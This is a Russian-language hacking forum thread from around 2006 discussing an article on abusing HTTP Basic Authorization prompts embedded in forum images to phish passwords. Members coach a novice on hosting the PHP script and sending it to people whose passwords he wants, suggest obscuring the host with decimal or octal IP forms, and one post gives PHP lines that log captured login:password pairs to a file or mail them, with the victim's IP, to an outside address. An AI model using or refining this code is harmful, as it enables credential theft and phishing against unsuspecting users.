Авторские статьи Применение Basic Authorization против форумов

Discussion in 'Статьи' started by hidden, 25 Jun 2006.

  1. Kanick

    Kanick Elder - Старейшина

    Joined:
    6 Sep 2005
    Messages:
    59
    Likes Received:
    30
    Reputations:
    32
    Ааааа!!! Честно, у меня была такая идея! Даже нахожусь на этапе ее реализации, и вот - наткнулся на эту статью. ИМХО - это очень перспективное направление, в эту сторону можно думать. Хотя я бы не стал об этом слишком распространяться, глядишь - и будут меры принимать ;)

    Отличная статья, спасибо.
     
  2. Kanick

    Kanick Elder - Старейшина

    Joined:
    6 Sep 2005
    Messages:
    59
    Likes Received:
    30
    Reputations:
    32
    Кстати, насчет решения. В Firefox, например, рядом с зоной авторизации показывается хост, на котором собственно лежит скрипт. И там, кажется, проблема с русскими кодировками в окошке - сложно вписать что-нибудь осмысленное. Но, к счастью, Firefox стоит у меньшинства :)
     
  3. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Это вообще не баг. И довольно старая вещь. Ничего с этого не поиметь. А забанить за такую картинку всегда можно, чтоб другим людям не мешали.
     
  4. Kanick

    Kanick Elder - Старейшина

    Joined:
    6 Sep 2005
    Messages:
    59
    Likes Received:
    30
    Reputations:
    32
    Егорыч+++, не баг, но "хак". На форумах - да. Но в Сети еще полно мест, куда можно вставить такую картинку, разведя на этом кучу лохов.
     
  5. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    фишенг )
     
  6. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    +СИ :)
     
  7. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Но ведь, никто про баг и не говорил, это лишь "Basic Authorization" + СИ.
    Да, а есль в строку браузера написать IP, а ещё если не просто IP, а в десятиричной форме, как думаещь, сколько процентов людей, непоймут что это такое.
    Но ведь можно, развадить англоязычное население, а также, тех кто знает английский ;)
     
  8. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    он в такой и идет =) в 16ричной так: 7f000001
     
  9. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    А я миел в виду 3585395723 или семиричной 032555146013, как думаешь, куда эти адреса ведут?
     
  10. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Это фича? :)
     
  11. KOLBA

    KOLBA New Member

    Joined:
    26 Mar 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    -3
    Прочитал статью за что автору респект , но я кое-что не понял .Помогите разобраться куда этот скрипт в 1 способе вставлять насколько я понял в картинку но если так то как !
     
  12. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Вставь его, в твой любимый текстовый редактор, например Блокнот(Notepad), сохрани под именем 111.php и залей на хостинг, а вот с хостингом, тебе придётся разбираться самому, они все разные.
    Кстати тут, я это уже упомянал.
     
  13. KOLBA

    KOLBA New Member

    Joined:
    26 Mar 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    -3
    ну а если залить на холм.ру или юкоз.ру ? И что мне эту страничку надо будет раздовать людям у которых я хочу узнать пасс и если они зайдут то пасс будет?
     
  14. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Я добавил новый пункт Заметь: к статье, посмотри.
    Надеюсь после этого если ктото и будет задавать вопросы, они хотябы небудут повторятса.
     
  15. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Статья хорошая, молодец! Но у мну после ввода паролья и логина в картинке нифига не показывается что ваш логин тот и пароль этот а ту на форуме у тя показывает :confused: и еще pass.gz увеличивает байты ...окрываю а там точки в место пассов... не подскажешь в чем трабла?
     
  16. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Картинка может не показыаться, если нет поддержки GD в PHP, или может какая небудь левая версия, хз.
    А строку сохранения паса ты поставил после определения переменных или до ;)
    Советую их поставить, куда небудь, в место действия else, чтобы сохнанялись только тогда когда ввели что небудь, в оба поля.
     
  17. cop

    cop Elder - Старейшина

    Joined:
    14 Nov 2006
    Messages:
    58
    Likes Received:
    1
    Reputations:
    4
    Кстати, как можно скрыть адрес сервера, на котором лежит скрипт?
     
  18. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Как-же тогда браузер поймёт к какому серверу обращаттся, если ты его скроишь? ;)
     
  19. steamer

    steamer Elder - Старейшина

    Joined:
    3 May 2006
    Messages:
    44
    Likes Received:
    7
    Reputations:
    1
    Я так понимаю смысл в том, что если длина логина меньше 3 символов или длина пароля меньше 1 символа то неавторизован. Но что-то я вбиваю и больше, а нифига. Не аффторизован, все время вылетает окошко снова и снова. Сначала грешил на фаерфокс, попробовал в экспорере - то же.
     
  20. Arin

    Arin Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    67
    Likes Received:
    29
    Reputations:
    6
    Статья хорошая. Мне понравилась.
    Только вот кажеться не совсем удобным:
    PHP:
    $fh=gzopen('pass.gz''a9');gzwrite($fh"$login:$pass\n");gzclose($fh);
    Мне больше подошло что бы пас с логином, если его кто то введет приходил на мыло. Для этого можно вышеозначенную строчку заменить например на:
    PHP:
    mail("Ваше мыло@ya.ru","$login:$pass\n","(".$REMOTE_ADDR.")\n\n"); 
    Логин и пас придут в теме письма, это полезно тк мыло будет зафлужено очень быстро. В теле письма будет ип человека.
    Кстати на рамблер не приходит,а на яндекс да, остальные не проверял.
    ЗЫ: строчка кода достаточна кривая, хотя и работает, лучше напишите свой вариант.

    Еще раз респект автору статьи. Всем удачи.